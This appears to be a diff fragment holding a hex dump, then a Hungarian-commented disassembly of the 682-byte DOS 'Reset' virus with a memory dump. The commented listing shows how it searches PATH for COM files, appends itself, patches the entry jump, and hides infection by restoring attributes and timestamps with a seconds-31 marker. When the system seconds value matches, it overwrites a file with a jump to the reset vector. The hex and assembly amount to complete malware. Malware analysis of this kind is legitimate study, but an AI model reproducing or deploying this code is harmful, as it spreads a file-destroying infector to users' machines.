0150 B9 04 00 AC AE 75 ED E2-FA 5E 07 89 BC 16 00 8B .....u...^......
|
||||
0160 FE 81 C7 1F 00 8B DE 81-C6 1F 00 8B FE EB 3A 83 ..............:.
|
||||
0170 BC 16 00 00 75 03 E9 60-01 1E 56 26 8E 1E 2C 00 ....u..`..V&..,.
|
||||
0180 8B FE 26 8B B5 16 00 81-C7 1F 00 AC 3C 3B 74 0A ..&.........<;t.
|
||||
0190 3C 00 74 03 AA EB F4 BE-00 00 5B 1F 89 B7 16 00 <.t.......[.....
|
||||
01A0 80 7D FF 5C 74 03 B0 5C-AA 89 BF 18 00 8B F3 81 .}.\t..\........
|
||||
01B0 C6 10 00 B9 06 00 F3 A4-8B F3 B4 4E BA 1F 00 90 ...........N....
|
||||
01C0 03 D6 B9 03 00 CD 21 EB-04 B4 4F CD 21 73 02 EB ......!...O.!s..
|
||||
01D0 9E 8B 84 75 00 24 1F 3C-1F 74 EE 81 BC 79 00 00 ...u.$.<.t...y..
|
||||
01E0 FA 77 E6 83 BC 79 00 0A-72 DF 8B BC 18 00 56 81 .w...y..r.....V.
|
||||
01F0 C6 7D 00 AC AA 3C 00 75-FA 5E B8 00 43 BA 1F 00 .}...<.u.^..C...
|
||||
0200 90 03 D6 CD 21 89 8C 08-00 B8 01 43 81 E1 FE FF ....!......C....
|
||||
0210 BA 1F 00 90 03 D6 CD 21-B8 02 3D BA 1F 00 90 03 .......!..=.....
|
||||
0220 D6 CD 21 73 03 E9 A2 00-8B D8 B8 00 57 CD 21 89 ..!s........W.!.
|
||||
0230 8C 04 00 89 94 06 00 B4-2C CD 21 80 E6 07 EB 0D ........,.!.....
|
||||
0240 90 B4 40 B9 05 00 8B D6-81 C2 8A 00 90 B4 3F B9 ..@...........?.
|
||||
0250 03 00 BA 0A 00 90 03 D6-CD 21 72 55 3D 03 00 75 .........!rU=..u
|
||||
0260 50 B8 02 42 B9 00 00 BA-00 00 CD 21 72 43 8B C8 P..B.......!rC..
|
||||
0270 2D 03 00 89 84 0E 00 81-C1 F9 02 8B FE 81 EF F7 -...............
|
||||
0280 01 89 0D B4 40 B9 36 03-8B D6 81 EA F9 01 CD 21 ....@.6........!
|
||||
0290 72 1F 3D 36 03 75 1A B8-00 42 B9 00 00 BA 00 00 r.=6.u...B......
|
||||
02A0 CD 21 72 0D B4 40 B9 03-00 8B D6 81 C2 0D 00 CD .!r..@..........
|
||||
02B0 21 8B 94 06 00 8B 8C 04-00 81 E1 E0 FF 81 C9 1F !...............
|
||||
02C0 00 B8 01 57 CD 21 B4 3E-CD 21 B8 01 43 8B 8C 08 ...W.!.>.!..C...
|
||||
02D0 00 BA 1F 00 90 03 D6 CD-21 1E B4 1A 8B 94 00 00 ........!.......
|
||||
02E0 8E 9C 02 00 CD 21 1F 59-33 C0 33 DB 33 D2 33 F6 .....!.Y3.3.3.3.
|
||||
02F0 BF 00 01 57 33 FF C2 FF-FF 80 00 57 0B 96 01 21 ...W3......W...!
|
||||
0300 00 20 00 E9 00 00 E9 FD-0F 2A 2E 43 4F 4D 00 71 . .......*.COM.q
|
||||
0310 07 21 07 50 41 54 48 3D-54 45 53 5A 54 2E 43 4F .!.PATH=TESZT.CO
|
||||
0320 4D 00 4F 4D 00 20 20 20-20 20 20 20 20 20 20 20 M.OM.
|
||||
0330 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0340 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
0350 20 20 20 20 20 20 20 20-03 3F 3F 3F 3F 3F 3F 3F .???????
|
||||
0360 3F 43 4F 4D 03 03 00 4B-09 A1 7D 73 6F 20 96 01 ?COM...K..}so ..
|
||||
0370 21 00 00 10 00 00 54 45-53 5A 54 2E 43 4F 4D 00 !.....TESZT.COM.
|
||||
0380 4F 4D 00 EA F0 FF 00 F0-50 53 51 52 06 1E 57 56 OM......PSQR..WV
|
||||
0390 E8 00 00 5B BE A5 5A BF-AA 55 0E 07 81 C3 E8 03 ...[..Z..U......
|
||||
03A0 81 FB E8 03 73 03 E9 82-00 53 B8 01 02 BA 00 00 ....s....S......
|
||||
03B0 B9 01 00 CD 13 5B 73 08-80 FC 06 74 EC EB 6C 90 .....[s....t..l.
|
||||
03C0 81 FE 5A A5 74 65 8C C8-05 00 10 53 50 CD 12 BB ..Z.te.....SP...
|
||||
03D0 40 00 F7 E3 2D 00 10 8B-D8 58 3B D8 73 04 5B EB @...-....X;.s.[.
|
||||
03E0 4A 90 5B 8E C0 2E 8B 47-18 2E 8B 4F 1A F7 E1 8B J.[....G...O....
|
||||
03F0 C8 2E 8B 47 13 BA 00 00-F7 F1 81 EB E8 03 53 8A ...G..........S.
|
||||
0400 E8 B1 01 BB 00 01 BA 00-00 B8 08 02 CD 13 5B 72 ..............[r
|
||||
0410 1A 53 BB 00 01 26 8B 07-3D 52 24 5B 75 0D 8B C3 .S...&..=R$[u...
|
||||
0420 05 98 00 0E 50 B8 0A 01-06 50 CB 5E 5F 1F 07 5A ....P....P.^_..Z
|
||||
0430 59 5B 58 C3 00 00 Y[X...
|
||||
|
|
@ -0,0 +1,571 @@
|
|||
Reset virus. Size 682 byte Hex: 02ac byte. Comment by Leslie Kovari
|
||||
(41) 21-033
|
||||
|
||||
|
||||
|
||||
Unassemble list:
|
||||
|
||||
114E:0100 E91F00 JMP 0122 ;ugras a virus kezdetere
|
||||
114E:0103 49 DEC CX
|
||||
114E:0104 60 DB 60
|
||||
114E:0105 61 DB 61
|
||||
114E:0106 6D DB 6D
|
||||
114E:0107 206120 AND [BX+DI+20],AH
|
||||
114E:010A 52 PUSH DX
|
||||
114E:010B 65 DB 65
|
||||
114E:010C 7365 JNB 0173
|
||||
114E:010E 7420 JZ 0130
|
||||
114E:0110 56 PUSH SI
|
||||
114E:0111 49 DEC CX
|
||||
114E:0112 52 PUSH DX
|
||||
114E:0113 55 PUSH BP
|
||||
114E:0114 53 PUSH BX
|
||||
114E:0115 2124 AND [SI],SP
|
||||
114E:0117 BA0301 MOV DX,0103 ;az eredeti fertozott
|
||||
;program kezdete
|
||||
114E:011A B409 MOV AH,09
|
||||
114E:011C CD21 INT 21 ;uzenet kepernyore
|
||||
114E:011E B400 MOV AH,00
|
||||
114E:0120 CD20 INT 20 ;exit to DOS
|
||||
|
||||
114E:0122 51 PUSH CX ;stack-en marad
|
||||
|
||||
;a kovetkezo utasitas operandusat fertozeskor
|
||||
;allitja be, igy mindig a helyes cimre mutat
|
||||
|
||||
114E:0123 BA1B03 MOV DX,031B
|
||||
114E:0126 FC CLD ;elore
|
||||
114E:0127 8BF2 MOV SI,DX
|
||||
114E:0129 81C60A00 ADD SI,000A ;SI=031b eredeti 3 byte
|
||||
114E:012D BF0001 MOV DI,0100 ;program eleje
|
||||
114E:0130 B90300 MOV CX,0003 ;3 byte
|
||||
114E:0133 F3 REPZ
|
||||
114E:0134 A4 MOVSB ;eredeti JMP 117
|
||||
;visszamasolasa
|
||||
114E:0135 8BF2 MOV SI,DX
|
||||
114E:0137 B430 MOV AH,30
|
||||
114E:0139 CD21 INT 21 ;DOS verzio szam lekerd.
|
||||
114E:013B 3C00 CMP AL,00
|
||||
114E:013D 7503 JNZ 0142
|
||||
114E:013F E9C701 JMP 0309 ;ha 00-as verzio akkor
|
||||
;nem fertoz a virus s
|
||||
;futtatja az eredeti
|
||||
;programot
|
||||
114E:0142 06 PUSH ES
|
||||
114E:0143 B42F MOV AH,2F
|
||||
114E:0145 CD21 INT 21 ;DTA. lekerdezese
|
||||
114E:0147 899C0000 MOV [SI+0000],BX ;BX= 0080 offset
|
||||
114E:014B 8C840200 MOV [SI+0002],ES ;eredeti DTA. mentese
|
||||
114E:014F 07 POP ES
|
||||
|
||||
;DTA. beallitasa az ENTRY cimere /dir.-bol/
|
||||
;ide masolja a find first a file adatait
|
||||
|
||||
114E:0150 BA5F00 MOV DX,005F ;DX=037a
|
||||
114E:0153 90 NOP
|
||||
114E:0154 03D6 ADD DX,SI
|
||||
114E:0156 B41A MOV AH,1A
|
||||
114E:0158 CD21 INT 21 ;DTA. letrehozasa
|
||||
;037a-tol uj cimre
|
||||
114E:015A 06 PUSH ES
|
||||
114E:015B 56 PUSH SI
|
||||
114E:015C 8E062C00 MOV ES,[002C] ;kornyezet szegmense
|
||||
114E:0160 BF0000 MOV DI,0000 ;elejetol ES:DI fog a
|
||||
;kovetkezo dir.-ra mu-
|
||||
;tatni
|
||||
114E:0163 5E POP SI
|
||||
114E:0164 56 PUSH SI
|
||||
114E:0165 81C61A00 ADD SI,001A ;ezen a cimen levo
|
||||
;stringet keresi a
|
||||
;kornyezetbe PATH
|
||||
114E:0169 AC LODSB ;AL=DS:[SI],SI++
|
||||
114E:016A B90080 MOV CX,8000 ;32 kbyte
|
||||
114E:016D F2 REPNZ
|
||||
114E:016E AE SCASB ;megkeresi a kovetke-
|
||||
;zo P betut
|
||||
114E:016F B90400 MOV CX,0004 ;a PATH feliratot keresi
|
||||
114E:0172 AC LODSB
|
||||
114E:0173 AE SCASB ;betunkent hasonlitja
|
||||
114E:0174 75ED JNZ 0163 ;ha nem egyezik a DI.
|
||||
;karakter /kov.betu/
|
||||
114E:0176 E2FA LOOP 0172 ;egyezik beolvassa es
|
||||
;osszehasonlitja a tobbi
|
||||
;betut is
|
||||
114E:0178 5E POP SI
|
||||
114E:0179 07 POP ES ;ES:DI mutat az elso
|
||||
;PATH-ra
|
||||
114E:017A 89BC1600 MOV [SI+0016],DI ;a PATH= szo utani file
|
||||
;spec. cimenek mentese
|
||||
;PATH mutato
|
||||
114E:017E 8BFE MOV DI,SI ;SI=031b
|
||||
114E:0180 81C71F00 ADD DI,001F ;DI=033a
|
||||
114E:0184 8BDE MOV BX,SI ;BX=031b ezutan BX mu-
|
||||
;tat az adatokra
|
||||
114E:0186 81C61F00 ADD SI,001F ;SI=033a
|
||||
114E:018A 8BFE MOV DI,SI ;DI=033a
|
||||
114E:018C EB3A JMP 01C8
|
||||
|
||||
;A kovetkezo PATH-ban megadott aldirectoryt
|
||||
;File Path-ra masolja, igy a kovetkezo file-t
|
||||
;ebben az aldirectoryban keresi
|
||||
|
||||
114E:018E 83BC160000 CMP WORD PTR [SI+0016],+00 ;
|
||||
114E:0193 7503 JNZ 0198
|
||||
114E:0195 E96301 JMP 02FB ;ha nincs osveny megadva
|
||||
114E:0198 1E PUSH DS
|
||||
114E:0199 56 PUSH SI
|
||||
114E:019A 26 ES:
|
||||
114E:019B 8E1E2C00 MOV DS,[002C] ;kornyezet szegmense
|
||||
114E:019F 8BFE MOV DI,SI ;DI=033a
|
||||
114E:01A1 26 ES:
|
||||
114E:01A2 8BB51600 MOV SI,[DI+0016] ;a kornyezetbol a path
|
||||
;masolasa ha az aktualis
|
||||
;konyvtarban nem talalt
|
||||
;fertozheto file-t
|
||||
;a PATH= utanra mutat
|
||||
;az SI
|
||||
114E:01A6 81C71F00 ADD DI,001F
|
||||
114E:01AA AC LODSB ;beolvas a kornyezetbol
|
||||
;a 0029. byte-ot
|
||||
114E:01AB 3C3B CMP AL,3B ;pontosvesszo ?
|
||||
114E:01AD 740A JZ 01B9 ;igen
|
||||
114E:01AF 3C00 CMP AL,00 ;PATH vege ? nem lesz
|
||||
;tobb
|
||||
114E:01B1 7403 JZ 01B6 ;igen
|
||||
114E:01B3 AA STOSB ;letarol 033a-tol
|
||||
114E:01B4 EBF4 JMP 01AA
|
||||
|
||||
114E:01B6 BE0000 MOV SI,0000
|
||||
114E:01B9 5B POP BX ;BX=regi SI BX mutat
|
||||
;az adatokra
|
||||
114E:01BA 1F POP DS
|
||||
114E:01BB 89B71600 MOV [BX+0016],SI
|
||||
|
||||
;a kovetkezo PATH-ban adott dir. mar atmasolva
|
||||
|
||||
114E:01BF 807DFF5C CMP BYTE PTR [DI-01],5C ; \ jel ?
|
||||
114E:01C3 7403 JZ 01C8 ;igen
|
||||
114E:01C5 B05C MOV AL,5C ;egyebkent \ iras
|
||||
|
||||
;egy aldir. kiertekelese, eloszor az aktualis, majd
|
||||
;a file path -ra masolt aldir. vegignezese, fertozes
|
||||
;DI a file path-ba irt aldir. neve utani poz.-ra mu-
|
||||
;tat
|
||||
|
||||
;COM file keresese
|
||||
|
||||
114E:01C7 AA STOSB ;\ jel beirasa
|
||||
114E:01C8 89BF1800 MOV [BX+0018],DI ;ide kell majd a
|
||||
;file nevet masolni,
|
||||
;az aldir. neve utan
|
||||
114E:01CC 8BF3 MOV SI,BX ;SI=031b DI=033d
|
||||
114E:01CE 81C61000 ADD SI,0010 ;SI=032b
|
||||
114E:01D2 B90600 MOV CX,0006
|
||||
114E:01D5 F3 REPZ
|
||||
114E:01D6 A4 MOVSB ;a *.COM szoveg beirasa
|
||||
;a PATH= szoveg utan
|
||||
114E:01D7 8BF3 MOV SI,BX
|
||||
114E:01D9 B44E MOV AH,4E ;a file adatai a DTA.
|
||||
;alltal foglalt teru-
|
||||
;letre
|
||||
114E:01DB BA1F00 MOV DX,001F
|
||||
114E:01DE 90 NOP
|
||||
114E:01DF 03D6 ADD DX,SI
|
||||
114E:01E1 B90300 MOV CX,0003
|
||||
114E:01E4 CD21 INT 21 ;elso file bejegyzes ke-
|
||||
;resese, az it. aktivi-
|
||||
;zalasa utan felhozza a
|
||||
;filemeretet, attrib.ot
|
||||
;keletkezes datumat s
|
||||
;idejet is!
|
||||
114E:01E6 EB04 JMP 01EC ;vizsgalatra
|
||||
114E:01E8 B44F MOV AH,4F
|
||||
114E:01EA CD21 INT 21 ;kovetkezo file bejegy-
|
||||
;zes keresese
|
||||
114E:01EC 7302 JNB 01F0 ;ha nincs hiba
|
||||
114E:01EE EB9E JMP 018E ;hiba eseten -ha nem
|
||||
;talal tobb COM file-t
|
||||
;mas aldirt keres
|
||||
;mar talalt COM file-t, az adataival az entry fel
|
||||
;van toltve, a file ellenorzese es fertozese
|
||||
;kovetkezik
|
||||
|
||||
114E:01F0 8B847500 MOV AX,[SI+0075] ;a keletkezesi ido AX-be
|
||||
;SI=0390
|
||||
114E:01F4 241F AND AL,1F ;maszk 31 -el
|
||||
114E:01F6 3C1F CMP AL,1F ;ha 31 akkor mar ferto-
|
||||
;zott a file!
|
||||
114E:01F8 74EE JZ 01E8 ;fertozott kovetkezo
|
||||
;file-t keresi
|
||||
114E:01FA 81BC790000FA CMP WORD PTR [SI+0079],FA00
|
||||
114E:0200 77E6 JA 01E8 ;ha > a file meret
|
||||
;64000 byte-nal
|
||||
114E:0202 83BC79000A CMP WORD PTR [SI+0079],+0A
|
||||
114E:0207 72DF JB 01E8 ;ha < 10 byte nal
|
||||
114E:0209 8BBC1800 MOV DI,[SI+0018] ;DI=033a
|
||||
|
||||
;megvan a kivalasztott file
|
||||
;a file nevet a filespec utan kell masolni
|
||||
|
||||
114E:020D 56 PUSH SI ;DI mutat a filespec.re,
|
||||
;PATH=*.COM
|
||||
114E:020E 81C67D00 ADD SI,007D ;SI=0398
|
||||
|
||||
114E:0212 AC LODSB ;atmasolja a filenevet
|
||||
;/megkeresett elso v.
|
||||
;x.edik bejegyzest/
|
||||
114E:0213 AA STOSB
|
||||
114E:0214 3C00 CMP AL,00 ;vegere ert ? nevle-
|
||||
;zaro nullaig masol
|
||||
114E:0216 75FA JNZ 0212 ;nem
|
||||
114E:0218 5E POP SI ;SI ujra az adatokra mu-
|
||||
;tat
|
||||
;a file egyes eredeti informacioinak megorzese
|
||||
;hogy a fertozese ne tunjon fel
|
||||
;minek a file ATTR. megegyszer lekerdezni?
|
||||
|
||||
114E:0219 B80043 MOV AX,4300
|
||||
114E:021C BA1F00 MOV DX,001F ;DS:DX = filespec.
|
||||
114E:021F 90 NOP
|
||||
114E:0220 03D6 ADD DX,SI ;DX=031b
|
||||
114E:0222 CD21 INT 21 ;attributum lekerdezese
|
||||
;7.6.5.4.3.2.1.0.
|
||||
;x x a d v s h r
|
||||
114E:0224 898C0800 MOV [SI+0008],CX ;attributum
|
||||
114E:0228 B80143 MOV AX,4301
|
||||
114E:022B 81E1FEFF AND CX,FFFE ;ha Read Only akkor ARC.
|
||||
;ra valtoztatja
|
||||
114E:022F BA1F00 MOV DX,001F
|
||||
114E:0232 90 NOP
|
||||
114E:0233 03D6 ADD DX,SI ;DX=033a
|
||||
114E:0235 CD21 INT 21 ;attributum beallitasa
|
||||
|
||||
;file nyitasa
|
||||
|
||||
114E:0237 B8023D MOV AX,3D02
|
||||
114E:023A BA1F00 MOV DX,001F
|
||||
114E:023D 90 NOP
|
||||
114E:023E 03D6 ADD DX,SI ;DS:DX = filespec.
|
||||
114E:0240 CD21 INT 21 ;file nyitasa I/O ra
|
||||
114E:0242 7303 JNB 0247
|
||||
114E:0244 E9A500 JMP 02EC ;hiba eseten nincs
|
||||
;fertozes
|
||||
114E:0247 8BD8 MOV BX,AX ;handle
|
||||
|
||||
;a file idejenek lekerdezese de ez is megtalalhato az
|
||||
;ENTRY teruleten
|
||||
|
||||
114E:0249 B80057 MOV AX,5700
|
||||
114E:024C CD21 INT 21 ;file letrehozasi datum
|
||||
;es ido bekerese
|
||||
114E:024E 898C0400 MOV [SI+0004],CX ;ido CH-ora CL-perc
|
||||
DH-sec DL-1/100
|
||||
114E:0252 89940600 MOV [SI+0006],DX ;datum
|
||||
114E:0256 B42C MOV AH,2C
|
||||
114E:0258 CD21 INT 21 ;rendszerido bekerese
|
||||
|
||||
;annak eldontese hogy a filet tonkretegye-e
|
||||
;ha a masodperc 7 akkor tonkreteszi /aktualis/
|
||||
|
||||
114E:025A 80E607 AND DH,07 ;sec = 7 ?
|
||||
114E:025D 7510 JNZ 026F ;nem - nem tesz tonkre!
|
||||
|
||||
;file tonkretetele
|
||||
|
||||
114E:025F B440 MOV AH,40
|
||||
114E:0261 B90500 MOV CX,0005
|
||||
114E:0264 8BD6 MOV DX,SI ;reset
|
||||
114E:0266 81C28A00 ADD DX,008A ;DX=03a7 : JMP F000:FFF0
|
||||
114E:026A CD21 INT 21 ;file elejere ir 5 byte
|
||||
;-ot a RESET re ugrast!
|
||||
114E:026C EB65 JMP 02D3
|
||||
|
||||
114E:026E 90 NOP
|
||||
|
||||
;fertozes
|
||||
;az eredeti 3 byte megorzese hogy kesobb meg futtatni
|
||||
;lehessen
|
||||
|
||||
114E:026F B43F MOV AH,3F
|
||||
114E:0271 B90300 MOV CX,0003
|
||||
114E:0274 BA0A00 MOV DX,000A
|
||||
114E:0277 90 NOP
|
||||
114E:0278 03D6 ADD DX,SI ;DS:DX = puffer cima DTA
|
||||
114E:027A CD21 INT 21 ;a program eredeti elso
|
||||
;3 byte-jat beolvassa
|
||||
114E:027C 7255 JB 02D3 ;ha hiba van
|
||||
114E:027E 3D0300 CMP AX,0003 ;megvolt a 3 byte ?
|
||||
114E:0281 7550 JNZ 02D3 ;nem
|
||||
|
||||
;file vegere allas az uj cimek kiszamitasa
|
||||
|
||||
114E:0283 B80242 MOV AX,4202
|
||||
114E:0286 B90000 MOV CX,0000
|
||||
114E:0289 BA0000 MOV DX,0000
|
||||
114E:028C CD21 INT 21 ;file vegere pozicional
|
||||
114E:028E 7243 JB 02D3 ;ha hiba volt -nem
|
||||
;nagyon lehet hiba!
|
||||
|
||||
;file elejere irando JMP operandus kiszamitasa
|
||||
|
||||
114E:0290 8BC8 MOV CX,AX ;AX-ben filehossz
|
||||
114E:0292 2D0300 SUB AX,0003 ;AX-ben eltolas a JMP
|
||||
;utasitashoz amit a
|
||||
;file elejere fog irni
|
||||
;igy a JMP a file mos-
|
||||
;tani vege utani bytera
|
||||
;fog mutatni
|
||||
114E:0295 89840E00 MOV [SI+000E],AX ;JMP cim
|
||||
|
||||
;az uj file-on beluli adatterulet cimenek ki-
|
||||
;szamitasa es beallitasa
|
||||
|
||||
114E:0299 81C1F902 ADD CX,02F9 ;az uj file-on beluli
|
||||
;adatteruletre mutat
|
||||
114E:029D 8BFE MOV DI,SI
|
||||
114E:029F 81EFF701 SUB DI,01F7 ;virus elso utasitasa-
|
||||
;nak operandusanak
|
||||
;cime
|
||||
114E:02A3 890D MOV [DI],CX ;ide irja az adatterulet
|
||||
;cimet
|
||||
|
||||
;file moge masolja magat
|
||||
;filemutato a file vegere mutat
|
||||
|
||||
114E:02A5 B440 MOV AH,40
|
||||
114E:02A7 B98802 MOV CX,0288 ;a VIRUS hossza
|
||||
114E:02AA 8BD6 MOV DX,SI ;virus elso bytejara
|
||||
;mutat
|
||||
114E:02AC 81EAF901 SUB DX,01F9
|
||||
114E:02B0 CD21 INT 21 ;a FERTOZES onmagat a
|
||||
;program a fertozendo
|
||||
;program moge irja
|
||||
114E:02B2 721F JB 02D3 ;hiba eseten
|
||||
114E:02B4 3D8802 CMP AX,0288 ;kiirta onmagat ?
|
||||
114E:02B7 751A JNZ 02D3 ;igen
|
||||
|
||||
;az elso 3 byte atallitasa, egy file
|
||||
;vegere mutato ugro utasitasra
|
||||
|
||||
114E:02B9 B80042 MOV AX,4200
|
||||
114E:02BC B90000 MOV CX,0000
|
||||
114E:02BF BA0000 MOV DX,0000
|
||||
114E:02C2 CD21 INT 21 ;file pointer a vegere
|
||||
114E:02C4 720D JB 02D3 ;ha volt hiba -nem le-
|
||||
;het hiba!
|
||||
114E:02C6 B440 MOV AH,40
|
||||
114E:02C8 B90300 MOV CX,0003
|
||||
114E:02CB 8BD6 MOV DX,SI
|
||||
114E:02CD 81C20D00 ADD DX,000D ;DX=0329 ugro utasitasra
|
||||
;mutat
|
||||
114E:02D1 CD21 INT 21 ;3 byte kiirasa a fileba
|
||||
|
||||
;az eredeti ido -mar a fertozesjelzessel egyutt-
|
||||
;visszaallitasa
|
||||
|
||||
114E:02D3 8B940600 MOV DX,[SI+0006] ;datum
|
||||
114E:02D7 8B8C0400 MOV CX,[SI+0004] ;ido
|
||||
114E:02DB 81E1E0FF AND CX,FFE0 ;sec=0 -felesleges!
|
||||
114E:02DF 81C91F00 OR CX,001F ;sec=1f azaz 31, igy
|
||||
;jelzi hogy mar ferto-
|
||||
;zott egy file a SEC.
|
||||
;-et 31-re allitja a
|
||||
;file bejegyzesben
|
||||
; hour | min. | sec.
|
||||
;1111 1|111 111|0 0000
|
||||
114E:02E3 B80157 MOV AX,5701
|
||||
114E:02E6 CD21 INT 21 ;file keletk. ido beall.
|
||||
|
||||
;file zarasa
|
||||
|
||||
114E:02E8 B43E MOV AH,3E
|
||||
114E:02EA CD21 INT 21 ;file zarasa
|
||||
|
||||
;eredeti attributum visszaallitasa
|
||||
|
||||
114E:02EC B80143 MOV AX,4301
|
||||
114E:02EF 8B8C0800 MOV CX,[SI+0008] ;CX=0020 /ARC./
|
||||
114E:02F3 BA1F00 MOV DX,001F
|
||||
114E:02F6 90 NOP
|
||||
|
||||
;DTA. visszaallitasa az eredeti cimre
|
||||
|
||||
114E:02F7 03D6 ADD DX,SI
|
||||
114E:02F9 CD21 INT 21 ;file attr. beallitasa
|
||||
114E:02FB 1E PUSH DS
|
||||
114E:02FC B41A MOV AH,1A
|
||||
114E:02FE 8B940000 MOV DX,[SI+0000]
|
||||
114E:0302 8E9C0200 MOV DS,[SI+0002]
|
||||
114E:0306 CD21 INT 21 ;DTA. megadasa
|
||||
114E:0308 1F POP DS
|
||||
|
||||
;az eredeti program futtatasa
|
||||
|
||||
114E:0309 59 POP CX
|
||||
114E:030A 33C0 XOR AX,AX ;reg. nullazasa
|
||||
114E:030C 33DB XOR BX,BX
|
||||
114E:030E 33D2 XOR DX,DX
|
||||
114E:0310 33F6 XOR SI,SI
|
||||
114E:0312 BF0001 MOV DI,0100
|
||||
114E:0315 57 PUSH DI ;elteszi a 0100 offsetet
|
||||
;hogy a RET elo tudja
|
||||
;venni es odaugrik
|
||||
114E:0316 33FF XOR DI,DI
|
||||
114E:0318 C2FFFF RET FFFF ;ugras a 0100-as offset-
|
||||
;re, ott mar az eredeti
|
||||
;JMP 117 utasitas van,
|
||||
;igy vegrehajtodik az
|
||||
;eredeti prg.
|
||||
;SP- hogy minek ?
|
||||
114E:031B 800046 ADD BYTE PTR [BX+SI],46
|
||||
114E:031E 0D2001 OR AX,0120
|
||||
114E:0321 2100 AND [BX+SI],AX
|
||||
114E:0323 2000 AND [BX+SI],AL
|
||||
114E:0325 EB15 JMP 033C
|
||||
114E:0327 90 NOP
|
||||
114E:0328 E91F00 JMP 034A
|
||||
114E:032B 2A2E434F SUB CH,[4F43]
|
||||
114E:032F 4D DEC BP
|
||||
114E:0330 0028 ADD [BX+SI],CH
|
||||
114E:0332 004703 ADD [BX+03],AL
|
||||
114E:0335 50 PUSH AX
|
||||
114E:0336 41 INC CX
|
||||
114E:0337 54 PUSH SP
|
||||
114E:0338 48 DEC AX
|
||||
114E:0339 3D5245 CMP AX,4552
|
||||
114E:033C 53 PUSH BX
|
||||
114E:033D 45 INC BP
|
||||
114E:033E 54 PUSH SP
|
||||
114E:033F 2E CS:
|
||||
114E:0340 43 INC BX
|
||||
114E:0341 4F DEC DI
|
||||
114E:0342 4D DEC BP
|
||||
114E:0343 0000 ADD [BX+SI],AL
|
||||
114E:0345 0000 ADD [BX+SI],AL
|
||||
114E:0347 4D DEC BP
|
||||
114E:0348 004449 ADD [SI+49],AL
|
||||
114E:034B 54 PUSH SP
|
||||
114E:034C 2E CS:
|
||||
114E:034D 43 INC BX
|
||||
114E:034E 4F DEC DI
|
||||
114E:034F 4D DEC BP
|
||||
114E:0350 0000 ADD [BX+SI],AL
|
||||
114E:0352 2020 AND [BX+SI],AH
|
||||
114E:0354 2020 AND [BX+SI],AH
|
||||
114E:0356 2020 AND [BX+SI],AH
|
||||
114E:0358 2020 AND [BX+SI],AH
|
||||
114E:035A 2020 AND [BX+SI],AH
|
||||
114E:035C 2020 AND [BX+SI],AH
|
||||
114E:035E 2020 AND [BX+SI],AH
|
||||
114E:0360 2020 AND [BX+SI],AH
|
||||
114E:0362 2020 AND [BX+SI],AH
|
||||
114E:0364 2020 AND [BX+SI],AH
|
||||
114E:0366 2020 AND [BX+SI],AH
|
||||
114E:0368 2020 AND [BX+SI],AH
|
||||
114E:036A 2020 AND [BX+SI],AH
|
||||
114E:036C 2020 AND [BX+SI],AH
|
||||
114E:036E 2020 AND [BX+SI],AH
|
||||
114E:0370 2020 AND [BX+SI],AH
|
||||
114E:0372 2020 AND [BX+SI],AH
|
||||
114E:0374 2020 AND [BX+SI],AH
|
||||
114E:0376 2020 AND [BX+SI],AH
|
||||
114E:0378 2020 AND [BX+SI],AH
|
||||
114E:037A 013F ADD [BX],DI
|
||||
114E:037C 3F AAS
|
||||
114E:037D 3F AAS
|
||||
114E:037E 3F AAS
|
||||
114E:037F 3F AAS
|
||||
114E:0380 3F AAS
|
||||
114E:0381 3F AAS
|
||||
114E:0382 3F AAS
|
||||
114E:0383 43 INC BX
|
||||
114E:0384 4F DEC DI
|
||||
114E:0385 4D DEC BP
|
||||
114E:0386 0301 ADD AX,[BX+DI]
|
||||
114E:0388 0000 ADD [BX+SI],AL
|
||||
114E:038A 002E8B26 ADD [268B],CH
|
||||
114E:038E 68 DB 68
|
||||
114E:038F 2020 AND [BX+SI],AH
|
||||
114E:0391 0121 ADD [BX+DI],SP
|
||||
114E:0393 0022 ADD [BP+SI],AH
|
||||
114E:0395 0000 ADD [BX+SI],AL
|
||||
114E:0397 005245 ADD [BP+SI+45],DL
|
||||
114E:039A 53 PUSH BX
|
||||
114E:039B 45 INC BP
|
||||
114E:039C 54 PUSH SP
|
||||
114E:039D 2E CS:
|
||||
114E:039E 43 INC BX
|
||||
114E:039F 4F DEC DI
|
||||
114E:03A0 4D DEC BP
|
||||
114E:03A1 0000 ADD [BX+SI],AL
|
||||
114E:03A3 4D DEC BP
|
||||
114E:03A4 00EA ADD DL,CH
|
||||
114E:03A6 F0 LOCK
|
||||
114E:03A7 FF00 INC WORD PTR [BX+SI]
|
||||
114E:03A9 F0 LOCK
|
||||
114E:03AA 16 PUSH SS
|
||||
114E:03AB 7C14 JL 03C1
|
||||
|
||||
Dump list:
|
||||
|
||||
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
|
||||
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
|
||||
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
|
||||
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
|
||||
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
|
||||
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
|
||||
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
|
||||
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
|
||||
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
|
||||
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
|
||||
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
|
||||
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
|
||||
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
|
||||
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
